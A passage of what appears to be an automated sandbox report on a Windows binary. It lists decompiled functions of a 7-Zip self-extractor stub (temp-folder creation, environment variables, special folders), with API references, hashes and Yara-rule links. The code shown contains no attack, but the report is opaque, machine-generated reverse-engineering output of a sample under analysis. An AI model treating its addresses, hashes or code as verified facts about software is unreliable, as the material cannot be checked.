                                          0x004046a5
                                          0x004046a8
                                          0x004046b7
                                          0x004046b9
                                          0x004046c1
                                          0x004046ca
                                          0x004046cf
                                          0x004046d0
                                          0x004046d0
                                          0x004046f6
                                          0x004046e4
                                          0x004046d5
                                          0x004046dc
                                          0x00000000
                                          0x004046e3
                                          0x004046e3
                                          0x00000000
                                          0x004046e3
                                          0x004046dc
                                          0x004046ea
                                          0x0040479c
                                          0x004047c8
                                          0x004047cd
                                          0x004047d2
                                          0x004047d5
                                          0x00000000
                                          0x004047dd
                                          0x004047a1
                                          0x004047a9
                                          0x00000000
                                          0x004047b8
                                          0x004047ba
                                          0x004047bb
                                          0x004047bb
                                          0x004047be
                                          0x00000000
                                          0x004047c4
                                          0x004047a9
                                          0x004046f2
                                          0x004046f2
                                          0x00404705
                                          0x0040470c
                                          0x00404714
                                          0x00000000
                                          0x0040472b
                                          0x00404788
                                          0x00404753
                                          0x00404757
                                          0x0040475e
                                          0x00404764
                                          0x00404777
                                          0x0040477b
                                          0x00404768
                                          0x0040476f
                                          0x00000000
                                          0x00404776
                                          0x00404776
                                          0x00404776
                                          0x00000000
                                          0x00404776
                                          0x0040476f
                                          0x0040477d
                                          0x0040477f
                                          0x00000000
                                          0x0040477f
                                          0x00000000
                                          0x00404766
                                          0x0040478a
                                          0x0040478d
                                          0x00000000
                                          0x00404795
                                          0x0040473b
                                          0x00404724
                                          0x00404724
                                          0x00000000
                                          0x00404724
                                          0x00404716
                                          0x00404722
                                          0x00000000
                                          0x00000000
                                          0x00000000

                                          APIs
                                          • lstrlenW.KERNEL32(?,0042289C,XhV,00000000,?,?,?,00402D14,PreExtract,0041DA3C,00422868), ref: 00404699
                                            • Part of subcall function 00414803: memcpy.MSVCRT ref: 00414829
                                            • Part of subcall function 0040420B: wcsncpy.MSVCRT ref: 00404239
                                            • Part of subcall function 0040420B: ??3@YAXPAX@Z.MSVCRT ref: 00404244
                                          • GetSystemTimeAsFileTime.KERNEL32(00402D14,00000000,?,?,0042289C,XhV,00000000,?,?,?,00402D14,PreExtract,0041DA3C,00422868), ref: 00404705
                                          • GetFileAttributesW.KERNELBASE(00000000,?,?,0042289C,XhV,00000000,?,?,?,00402D14,PreExtract,0041DA3C,00422868), ref: 0040470C
                                          • memcpy.MSVCRT ref: 00404757
                                          • ??3@YAXPAX@Z.MSVCRT ref: 0040478D
                                          • ??3@YAXPAX@Z.MSVCRT ref: 004047BE
                                          • ??3@YAXPAX@Z.MSVCRT ref: 004047D5
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.708189503.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000010.00000002.708184369.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.708207849.000000000041D000.00000002.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.708216748.0000000000422000.00000004.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.708225050.0000000000427000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: ??3@$FileTimememcpy$AttributesSystemlstrlenwcsncpy
                                          • String ID: XhV
                                          • API String ID: 1217483450-2999104372
                                          • Opcode ID: c40a2e58beeca85b6848cfdc38d98d139db898f4e38930355818f6ccf7c5af0f
                                          • Instruction ID: be3e48701bef0db7d10aa87f87c9b6a307b0c6ea187aa39f9109aeae5b1a0e1c
                                          • Opcode Fuzzy Hash: c40a2e58beeca85b6848cfdc38d98d139db898f4e38930355818f6ccf7c5af0f
                                          • Instruction Fuzzy Hash: 5B412BB5900215A6CB20BBA58885ABF73B4EF86704F504537EA02F32C1E73C9D4287DD
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0040541A, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 80libraryCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 83%
                                          			E0040541A(void* __edx) {
				short _v96;
				char _v620;
				intOrPtr _t11;
				intOrPtr _t12;
				intOrPtr _t13;
				intOrPtr _t14;
				intOrPtr _t15;
				intOrPtr _t16;
				char* _t18;
				WCHAR* _t22;
				WCHAR* _t23;
				WCHAR* _t24;
				WCHAR* _t25;
				WCHAR* _t26;
				WCHAR* _t27;
				WCHAR* _t28;
				void* _t34;
				void* _t35;
				void* _t36;

				 *0x42275c = LoadLibraryA("kernel32");
				__imp__#17();
				E00403C85(E0041BD00());
				_t22 = 3;
				_t11 = E00403CE0(_t22);
				_t23 = 0x28;
				 *0x422760 = _t11;
				_t12 = E00403CE0(_t23);
				_t24 = 2;
				 *0x42274c = _t12;
				_t13 = E00403CE0(_t24);
				_t25 = 5;
				 *0x422738 = _t13;
				_t14 = E00403CE0(_t25);
				_t26 = 0x15;
				 *0x42273c = _t14;
				_t15 = E00403CE0(_t26);
				_t27 = 0x16;
				 *0x422754 = _t15;
				_t16 = E00403CE0(_t27);
				_t28 = 0x17;
				 *0x422748 = _t16;
				 *0x422744 = E00403CE0(_t28);
				 *0x422758 = 0;
				 *0x422750 = 0;
				_t34 = 0;
				do {
					_t18 =  &_v620;
					__imp__SHGetSpecialFolderPathW(0, _t18, _t34, 0); // executed
					_t38 = _t18;
					if(_t18 != 0) {
						wsprintfW( &_v96, L"SfxFolder%02d", _t34);
						_t36 = _t36 + 0xc;
						_t18 = E00404F69( &_v96,  &_v620, _t38, 1); // executed
						_t35 = 0;
						do {
							_t40 =  *((intOrPtr*)(_t35 + 0x42246c)) - _t34;
							if( *((intOrPtr*)(_t35 + 0x42246c)) == _t34) {
								_t6 = _t35 + 0x422470; // 0x41ea7c
								_t18 = E00404F69( *_t6,  &_v620, _t40, 0);
							}
							_t35 = _t35 + 8;
						} while (_t35 < 0x28);
					}
					_t34 = _t34 + 1;
				} while (_t34 < 0x40);
				return _t18;
			}






















                                          0x00405431
                                          0x00405436
                                          0x00405441
                                          0x00405448
                                          0x00405449
                                          0x00405450
                                          0x00405451
                                          0x00405456
                                          0x0040545d
                                          0x0040545e
                                          0x00405463
                                          0x0040546a
                                          0x0040546b
                                          0x00405470
                                          0x00405477
                                          0x00405478
                                          0x0040547d
                                          0x00405484
                                          0x00405485
                                          0x0040548a
                                          0x00405491
                                          0x00405492
                                          0x0040549e
                                          0x004054a3
                                          0x004054a9
                                          0x004054af
                                          0x004054b1
                                          0x004054b3
                                          0x004054bb
                                          0x004054c1
                                          0x004054c3
                                          0x004054cf
                                          0x004054d5
                                          0x004054e3
                                          0x004054e8
                                          0x004054ea
                                          0x004054ea
                                          0x004054f0
                                          0x004054f2
                                          0x004054ff
                                          0x004054ff
                                          0x00405504
                                          0x00405507
                                          0x004054ea
                                          0x0040550c
                                          0x0040550d
                                          0x00405516

                                          APIs
                                          • LoadLibraryA.KERNEL32(kernel32,?,?,00000000), ref: 0040542B
                                          • #17.COMCTL32(?,?,00000000), ref: 00405436
                                            • Part of subcall function 00403C85: GetUserDefaultUILanguage.KERNEL32(00405446,?,?,00000000), ref: 00403C8F
                                            • Part of subcall function 00403CE0: GetLastError.KERNEL32(?,?,00000000), ref: 00403D2F
                                            • Part of subcall function 00403CE0: wsprintfW.USER32 ref: 00403D40
                                            • Part of subcall function 00403CE0: GetEnvironmentVariableW.KERNEL32(?,00000000,00000000), ref: 00403D55
                                            • Part of subcall function 00403CE0: GetLastError.KERNEL32 ref: 00403D5A
                                            • Part of subcall function 00403CE0: ??2@YAPAXI@Z.MSVCRT ref: 00403D75
                                            • Part of subcall function 00403CE0: GetEnvironmentVariableW.KERNEL32(?,00000000,?), ref: 00403D88
                                            • Part of subcall function 00403CE0: GetLastError.KERNEL32 ref: 00403D8F
                                            • Part of subcall function 00403CE0: lstrcmpiW.KERNEL32(046550E8,00000000), ref: 00403DA4
                                            • Part of subcall function 00403CE0: ??3@YAXPAX@Z.MSVCRT ref: 00403DB4
                                            • Part of subcall function 00403CE0: SetLastError.KERNEL32(?), ref: 00403DDB
                                            • Part of subcall function 00403CE0: lstrlenA.KERNEL32(0041E930), ref: 00403E11
                                            • Part of subcall function 00403CE0: ??2@YAPAXI@Z.MSVCRT ref: 00403E2C
                                            • Part of subcall function 00403CE0: GetLocaleInfoW.KERNEL32(?,00001004,?,0000001F), ref: 00403E5E
                                            • Part of subcall function 00403CE0: ??3@YAXPAX@Z.MSVCRT ref: 00403DD2
                                            • Part of subcall function 00403CE0: _wtol.MSVCRT(?), ref: 00403E6F
                                            • Part of subcall function 00403CE0: MultiByteToWideChar.KERNEL32(00000000,0041E930,00000001,046550E8,00000002), ref: 00403E8F
                                          • SHGetSpecialFolderPathW.SHELL32(00000000,?,00000000,00000000,?,?,00000000), ref: 004054BB
                                          • wsprintfW.USER32 ref: 004054CF
                                            • Part of subcall function 00404F69: ??3@YAXPAX@Z.MSVCRT ref: 00404FD0
                                            • Part of subcall function 00404F69: ??3@YAXPAX@Z.MSVCRT ref: 00404FD9
                                            • Part of subcall function 00404F69: ??3@YAXPAX@Z.MSVCRT ref: 00404FE1
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.708189503.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000010.00000002.708184369.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.708207849.000000000041D000.00000002.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.708216748.0000000000422000.00000004.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.708225050.0000000000427000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: ??3@$ErrorLast$??2@EnvironmentVariablewsprintf$ByteCharDefaultFolderInfoLanguageLibraryLoadLocaleMultiPathSpecialUserWide_wtollstrcmpilstrlen
                                          • String ID: SfxFolder%02d$kernel32
                                          • API String ID: 2610933736-229743753
                                          • Opcode ID: 27ead35fb50d2f33e65111c77d6bae5c444255d28e9266b456b9df8d0fbc8345
                                          • Instruction ID: e45f6d1b6f058e368b4ee535d696ebea441a5b3f064171d76d7118da654f54dd
                                          • Opcode Fuzzy Hash: 27ead35fb50d2f33e65111c77d6bae5c444255d28e9266b456b9df8d0fbc8345
                                          • Instruction Fuzzy Hash: 8B21D3B2A0831467D730AF76AD4AB8A7BA8FB84345F40453FF405F61D0DAF84582CA4C
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 004042B5, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 59COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E004042B5(intOrPtr __edx, void* __eflags) {
				void* __ecx;
				void* _t8;
				long _t11;
				WCHAR* _t12;
				long _t17;
				short* _t22;
				long _t23;
				WCHAR** _t24;
				void* _t34;
				WCHAR** _t35;
				short _t36;
				void* _t37;

				 *((intOrPtr*)(_t37 + 0x10)) = __edx;
				_t35 = _t24;
				E004147DF(_t8, _t24);
				_t11 = GetTempPathW(1, E0040420B(_t35, __edx, 2));
				_t36 = 0;
				_t35[1] = 0;
				 *( *_t35) = 0;
				if(_t11 > 0) {
					_t3 = _t11 + 1; // 0x1
					_t23 = _t3;
					GetTempPathW(_t23, E0040420B(_t35, 0, _t23));
					E004041F0(_t35);
				}
				_t12 = _t35[1];
				_t22 =  &(_t12[7]);
				_t34 = _t12 + _t12;
				while(1) {
					wsprintfW(E0040420B(_t35, 0, _t22) + _t34,  *(_t37 + 0x14), _t36);
					_t37 = _t37 + 0xc;
					E004041F0(_t35);
					_t17 = GetFileAttributesW( *_t35); // executed
					if(_t17 == 0xffffffff) {
						break;
					}
					_t36 = _t36 + 1;
					if(_t36 < 0xfff) {
						continue;
					}
					break;
				}
				return _t35;
			}















                                          0x004042ba
                                          0x004042be
                                          0x004042c0
                                          0x004042d7
                                          0x004042db
                                          0x004042df
                                          0x004042e2
                                          0x004042e7
                                          0x004042e9
                                          0x004042e9
                                          0x004042f6
                                          0x004042fa
                                          0x004042fa
                                          0x004042ff
                                          0x00404302
                                          0x00404305
                                          0x00404308
                                          0x00404318
                                          0x0040431e
                                          0x00404323
                                          0x0040432a
                                          0x00404333
                                          0x00000000
                                          0x00000000
                                          0x00404335
                                          0x0040433c
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x0040433c
                                          0x00404345

                                          APIs
                                            • Part of subcall function 004147DF: ??2@YAPAXI@Z.MSVCRT ref: 004147E7
                                            • Part of subcall function 0040420B: wcsncpy.MSVCRT ref: 00404239
                                            • Part of subcall function 0040420B: ??3@YAXPAX@Z.MSVCRT ref: 00404244
                                          • GetTempPathW.KERNEL32(00000001,00000000,00000002,PreExtract,0041DA3C,?,00000000,?,00405B0D), ref: 004042D7
                                          • GetTempPathW.KERNEL32(00000001,00000000,00000001,?,00000000,?,00405B0D), ref: 004042F6
                                          • wsprintfW.USER32 ref: 00404318
                                          • GetFileAttributesW.KERNELBASE(?,?,?,00405B0D,?,?,?,?,?,?,?,?,?,?,00406FBC,00422844), ref: 0040432A
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.708189503.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000010.00000002.708184369.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.708207849.000000000041D000.00000002.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.708216748.0000000000422000.00000004.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.708225050.0000000000427000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: PathTemp$??2@??3@AttributesFilewcsncpywsprintf
                                          • String ID: PreExtract
                                          • API String ID: 342973707-1883995278
                                          • Opcode ID: a6599ca690dd662ebfa5923f67b0ec3bebfb6a87c19678d5d5b6f9956c1d313b
                                          • Instruction ID: 23435fb80e171e00c8212a570b1b2e158bd2c4d8a66f38a82b80c7934b06bc9c
                                          • Opcode Fuzzy Hash: a6599ca690dd662ebfa5923f67b0ec3bebfb6a87c19678d5d5b6f9956c1d313b
                                          • Instruction Fuzzy Hash: 6E0126B03006185BC224AB6A9C49D2EF79DFFC4748B01447EF116D72E2CF7968068668
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00407370, Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 43COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 94%
                                          			E00407370(void* __ecx, void* __edx) {
				intOrPtr _v16;
				void* _t10;
				signed int _t12;
				void* _t15;
				void* _t30;

				_t30 = __ecx;
				if( *((intOrPtr*)(__ecx + 8)) == 0) {
					__eflags =  *0x422774 & 0x00000080;
					if(__eflags == 0) {
						_t28 = L"7ZipSfx.%03x";
						_t10 = E004042B5(L"7ZipSfx.%03x", __eflags);
						_t6 = _t30 + 4; // 0x42286c
						E004148C7(_t6, _t10);
						_push(_v16);
						L0041C160();
						_t8 = _t30 + 4; // 0x4658ff8, executed
						_t12 = E0040468A( *_t8, L"7ZipSfx.%03x"); // executed
						__eflags = _t12;
						if(_t12 != 0) {
							E00407370(_t30, _t28);
							_t9 = _t30 + 4; // 0x4658ff8
							E00404F69(L"SfxVarApiPath",  *_t9, __eflags, 0);
							_t15 = E00407489();
						} else {
							_t15 = 0;
						}
						return _t15;
					}
					_t4 = _t30 + 4; // 0x42286c
					E004148C7(_t4, 0x422794);
				}
				return 1;
			}








                                          0x00407377
                                          0x0040737d
                                          0x00407383
                                          0x0040738a
                                          0x0040739c
                                          0x004073a4
                                          0x004073aa
                                          0x004073ad
                                          0x004073b2
                                          0x004073b5
                                          0x004073bb
                                          0x004073be
                                          0x004073c3
                                          0x004073c5
                                          0x004073cd
                                          0x004073d2
                                          0x004073dc
                                          0x004073e3
                                          0x004073c7
                                          0x004073c7
                                          0x004073c7
                                          0x00000000
                                          0x004073e8
                                          0x00407391
                                          0x00407394
                                          0x00407394
                                          0x00000000

                                          APIs
                                            • Part of subcall function 004042B5: GetTempPathW.KERNEL32(00000001,00000000,00000002,PreExtract,0041DA3C,?,00000000,?,00405B0D), ref: 004042D7
                                            • Part of subcall function 004042B5: GetTempPathW.KERNEL32(00000001,00000000,00000001,?,00000000,?,00405B0D), ref: 004042F6
                                            • Part of subcall function 004042B5: wsprintfW.USER32 ref: 00404318
                                            • Part of subcall function 004042B5: GetFileAttributesW.KERNELBASE(?,?,?,00405B0D,?,?,?,?,?,?,?,?,?,?,00406FBC,00422844), ref: 0040432A
                                            • Part of subcall function 004148C7: ??2@YAPAXI@Z.MSVCRT ref: 004148EF
                                            • Part of subcall function 004148C7: ??3@YAXPAX@Z.MSVCRT ref: 004148F8
                                            • Part of subcall function 004148C7: memcpy.MSVCRT ref: 00414912
                                          • ??3@YAXPAX@Z.MSVCRT ref: 004073B5
                                            • Part of subcall function 0040468A: lstrlenW.KERNEL32(?,0042289C,XhV,00000000,?,?,?,00402D14,PreExtract,0041DA3C,00422868), ref: 00404699
                                            • Part of subcall function 0040468A: GetSystemTimeAsFileTime.KERNEL32(00402D14,00000000,?,?,0042289C,XhV,00000000,?,?,?,00402D14,PreExtract,0041DA3C,00422868), ref: 00404705
                                            • Part of subcall function 0040468A: GetFileAttributesW.KERNELBASE(00000000,?,?,0042289C,XhV,00000000,?,?,?,00402D14,PreExtract,0041DA3C,00422868), ref: 0040470C
                                            • Part of subcall function 0040468A: ??3@YAXPAX@Z.MSVCRT ref: 004047BE
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.708189503.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000010.00000002.708184369.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.708207849.000000000041D000.00000002.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.708216748.0000000000422000.00000004.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.708225050.0000000000427000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: ??3@File$AttributesPathTempTime$??2@Systemlstrlenmemcpywsprintf
                                          • String ID: 7ZipSfx.%03x$PreExtract$SfxVarApiPath
                                          • API String ID: 1986220984-914423340
                                          • Opcode ID: cdb3f7bb5ac2d12320311beab728f6828f1d1e75d340e5aaf093e49a1a50412a
                                          • Instruction ID: 4fe307b9cc81ca859ba38963731d71e1e657172fdbf814944284d27904e1fcdc
                                          • Opcode Fuzzy Hash: cdb3f7bb5ac2d12320311beab728f6828f1d1e75d340e5aaf093e49a1a50412a
                                          • Instruction Fuzzy Hash: 30F08671A0C60266D6047726D952AFEB3556BC1704F10423FED11761D1DB7CB846E68F
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00403092, Relevance: 6.0, APIs: 4, Instructions: 29COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 53%
                                          			E00403092(WCHAR* __ecx) {
				int _t2;
				long _t5;
				signed char _t6;
				WCHAR* _t9;

				_t9 = __ecx;
				_t2 = CreateDirectoryW(__ecx, 0); // executed
				if(_t2 != 0) {
					L7:
					return 1;
				}
				_t5 = GetLastError();
				if(_t5 == 0xb7) {
					_t6 = GetFileAttributesW(_t9); // executed
					if(_t6 == 0xffffffff || (_t6 & 0x00000010) != 0) {
						goto L7;
					} else {
						_push(0xb7);
						L3:
						SetLastError();
						return 0;
					}
				}
				_push(_t5);
				goto L3;
			}







                                          0x00403094
                                          0x00403099
                                          0x004030a1
                                          0x004030d0
                                          0x00000000
                                          0x004030d2
                                          0x004030a3
                                          0x004030b0
                                          0x004030be
                                          0x004030c7
                                          0x00000000
                                          0x004030cd
                                          0x004030cd
                                          0x004030b3
                                          0x004030b3
                                          0x00000000
                                          0x004030b9
                                          0x004030c7
                                          0x004030b2
                                          0x00000000

                                          APIs
                                          • CreateDirectoryW.KERNELBASE(00000000,00000000,00000000,-00000001,004046FD,00000000,?,?,0042289C,XhV,00000000,?,?,?,00402D14,PreExtract), ref: 00403099
                                          • GetLastError.KERNEL32(?,?,0042289C,XhV,00000000,?,?,?,00402D14,PreExtract,0041DA3C,00422868), ref: 004030A3
                                          • SetLastError.KERNEL32(000000B7,?,?,0042289C,XhV,00000000,?,?,?,00402D14,PreExtract,0041DA3C,00422868), ref: 004030B3
                                          • GetFileAttributesW.KERNELBASE(00000000,?,?,0042289C,XhV,00000000,?,?,?,00402D14,PreExtract,0041DA3C,00422868), ref: 004030BE
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.708189503.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000010.00000002.708184369.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.708207849.000000000041D000.00000002.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.708216748.0000000000422000.00000004.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.708225050.0000000000427000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: ErrorLast$AttributesCreateDirectoryFile
                                          • String ID:
                                          • API String ID: 635176117-0
                                          • Opcode ID: c5cc671423ab482ec682e2615689a590c7d79424ef60dffe5937396f84b5532a
                                          • Instruction ID: a770e4f8708b8688440dc55708b068f6f30b91d097a371ede7b7596a26aef620
                                          • Opcode Fuzzy Hash: c5cc671423ab482ec682e2615689a590c7d79424ef60dffe5937396f84b5532a
                                          • Instruction Fuzzy Hash: 65E0DF70B421106BE6201F34AC0CBBB3EAC9F86723F200572F406F02E8D738A902416E
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 004022F7, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 73COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 92%
                                          			E004022F7(intOrPtr __ecx, intOrPtr __edx, signed short* _a4, intOrPtr* _a8, signed int _a12) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v28;
				char _v40;
				signed int _t34;
				signed short* _t55;
				intOrPtr* _t58;

				_v8 = _v8 & 0x00000000;
				_v12 = __ecx;
				_v16 = __edx;
				E00414803( &_v28, __ecx);
				_t55 = _a4;
				E00401585( &_v28,  *_t55 & 0x0000ffff);
				_t58 = _a8;
				L1:
				while(E00404F59() == 0) {
					_t55 =  &(_t55[1]);
					_t34 =  *_t55 & 0x0000ffff;
					if(_t34 >= 0x30 && _t34 <= 0x39) {
						L8:
						E00414864( &_v28, _v12);
						E00401585( &_v28,  *_t55 & 0x0000ffff);
						_v8 = _v8 & 0x00000000;
						continue;
					}
					if(_t34 >= 0x61 && _t34 <= 0x7a) {
						goto L8;
					}
					if(_t34 >= 0x41 && _t34 <= 0x5a) {
						goto L8;
					}
					_push(_v28);
					L0041C160();
					return 1;
				}
				E00414803( &_v40, _t30);
				E00402008( &_v40, _v16, 0, _t58, _a12); // executed
				_push(_v40);
				L0041C160();
				 *(_t58 + 4) =  *(_t58 + 4) & 0x00000000;
				 *((short*)( *_t58)) = 0;
				_v8 = _v8 + 1;
				_a12 = 0x41da3c;
				goto L1;
			}











                                          0x004022fd
                                          0x00402303
                                          0x0040230a
                                          0x0040230d
                                          0x00402312
                                          0x0040231c
                                          0x00402321
                                          0x00000000
                                          0x00402324
                                          0x00402333
                                          0x00402336
                                          0x0040233c
                                          0x00402357
                                          0x0040235d
                                          0x00402369
                                          0x0040236e
                                          0x00000000
                                          0x0040236e
                                          0x00402346
                                          0x00000000
                                          0x00000000
                                          0x00402350
                                          0x00000000
                                          0x00000000
                                          0x004023b1
                                          0x004023b4
                                          0x004023c0
                                          0x004023c0
                                          0x00402378
                                          0x00402389
                                          0x0040238e
                                          0x00402391
                                          0x00402396
                                          0x0040239f
                                          0x004023a2
                                          0x004023a5
                                          0x00000000

                                          APIs
                                            • Part of subcall function 00414803: memcpy.MSVCRT ref: 00414829
                                          • ??3@YAXPAX@Z.MSVCRT ref: 00402391
                                          • ??3@YAXPAX@Z.MSVCRT ref: 004023B4
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.708189503.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000010.00000002.708184369.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.708207849.000000000041D000.00000002.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.708216748.0000000000422000.00000004.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.708225050.0000000000427000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: ??3@$memcpy
                                          • String ID: PreExtract
                                          • API String ID: 750647942-1883995278
                                          • Opcode ID: d6bf578f725f543e13e022a32d8de841b5d315580b01ea1004b035677edb59a7
                                          • Instruction ID: a2b2535204d0bd1d40afa8a24637eeedcdabe34f3f30c0d4779eef0099d19ea4
                                          • Opcode Fuzzy Hash: d6bf578f725f543e13e022a32d8de841b5d315580b01ea1004b035677edb59a7
                                          • Instruction Fuzzy Hash: A7216071810109EBCF18EFA1C986AEEB775EF55714F20446BE901B21D0EB789A85CA98
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00405D92, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 29COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 91%
                                          			E00405D92() {
				WCHAR* _v16;
				int _t9;
				intOrPtr _t10;
				intOrPtr _t15;
				signed int _t20;
				void* _t21;
				void* _t22;

				_t20 = 0;
				_t21 =  *0x42278c - _t20; // 0xa1
				if(_t21 > 0) {
					do {
						_t10 =  *0x422788; // 0x46581f8
						E00414839( &_v16,  *((intOrPtr*)(_t10 + _t20 * 4)) + 0xc);
						E00405546( &_v16, _t21);
						_t15 =  *0x422788; // 0x46581f8
						_t9 = SetEnvironmentVariableW( *( *(_t15 + _t20 * 4)), _v16); // executed
						_push(_v16);
						L0041C160();
						_t20 = _t20 + 1;
						_t22 = _t20 -  *0x42278c; // 0xa1
					} while (_t22 < 0);
				}
				return _t9;
			}










                                          0x00405d99
                                          0x00405d9b
                                          0x00405da1
                                          0x00405da3
                                          0x00405da3
                                          0x00405db2
                                          0x00405dba
                                          0x00405dbf
                                          0x00405dcc
                                          0x00405dd2
                                          0x00405dd5
                                          0x00405dda
                                          0x00405ddc
                                          0x00405ddc
                                          0x00405da3
                                          0x00405de6

                                          APIs
                                            • Part of subcall function 00414839: memcpy.MSVCRT ref: 00414855
                                          • SetEnvironmentVariableW.KERNELBASE(0056D650,00000000,0056D644,SetEnvironment,00000000,?,00000000), ref: 00405DCC
                                          • ??3@YAXPAX@Z.MSVCRT ref: 00405DD5
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.708189503.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000010.00000002.708184369.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.708207849.000000000041D000.00000002.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.708216748.0000000000422000.00000004.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.708225050.0000000000427000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: ??3@EnvironmentVariablememcpy
                                          • String ID: SetEnvironment
                                          • API String ID: 357128876-360490078
                                          • Opcode ID: c17486e3fa2c4f370ea57e6df63e83d7149b6fdd75b425cded03b3b157d7eda1
                                          • Instruction ID: 2e0a3868ca799af050514896d9321bb707874ea1176aa78625a46d01673c73f0
                                          • Opcode Fuzzy Hash: c17486e3fa2c4f370ea57e6df63e83d7149b6fdd75b425cded03b3b157d7eda1
                                          • Instruction Fuzzy Hash: F0F05831A04028BFCB10AB98ED4188EB7B4EF44304B80807AE411A7162DB70E942DF8A
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00403ECA, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 17libraryloaderCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 37%
                                          			E00403ECA() {
				signed short _v40;
				_Unknown_base(*)()* _t3;

				_t3 = GetProcAddress( *0x42275c, "GetNativeSystemInfo");
				if(_t3 == 0) {
					return 0;
				} else {
					 *_t3( &_v40); // executed
					return _v40 & 0x0000ffff;
				}
			}





                                          0x00403edb
                                          0x00403ee3
                                          0x00403ef4
                                          0x00403ee5
                                          0x00403ee9
                                          0x00403ef0
                                          0x00403ef0

                                          APIs
                                          • GetProcAddress.KERNEL32(GetNativeSystemInfo), ref: 00403EDB
                                          • GetNativeSystemInfo.KERNELBASE(?,?,?,00403EFA,004060E6,00000001,00000001,00000000,?,00000000), ref: 00403EE9
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.708189503.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000010.00000002.708184369.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.708207849.000000000041D000.00000002.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.708216748.0000000000422000.00000004.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.708225050.0000000000427000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: AddressInfoNativeProcSystem
                                          • String ID: GetNativeSystemInfo
                                          • API String ID: 2220751540-3949249589
                                          • Opcode ID: e22f0686ebb65b25f7cdc175e6ec18776ede25488796abf719b58fa9f8d677af
                                          • Instruction ID: 1a34752c2e7cb131041ffb1cf8b4a571675c73488951d52ca8f01a361a8aad4f
                                          • Opcode Fuzzy Hash: e22f0686ebb65b25f7cdc175e6ec18776ede25488796abf719b58fa9f8d677af
                                          • Instruction Fuzzy Hash: D4D0A7607042096ACB14DF71BD029DA77F896486487100174F802F00D0EAB9DD41D3A4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0041AE02, Relevance: 4.7, APIs: 3, Instructions: 220COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 16%
                                          			E0041AE02(signed int __ecx, signed int _a4, char _a8, short _a12, signed int _a16, intOrPtr _a20) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
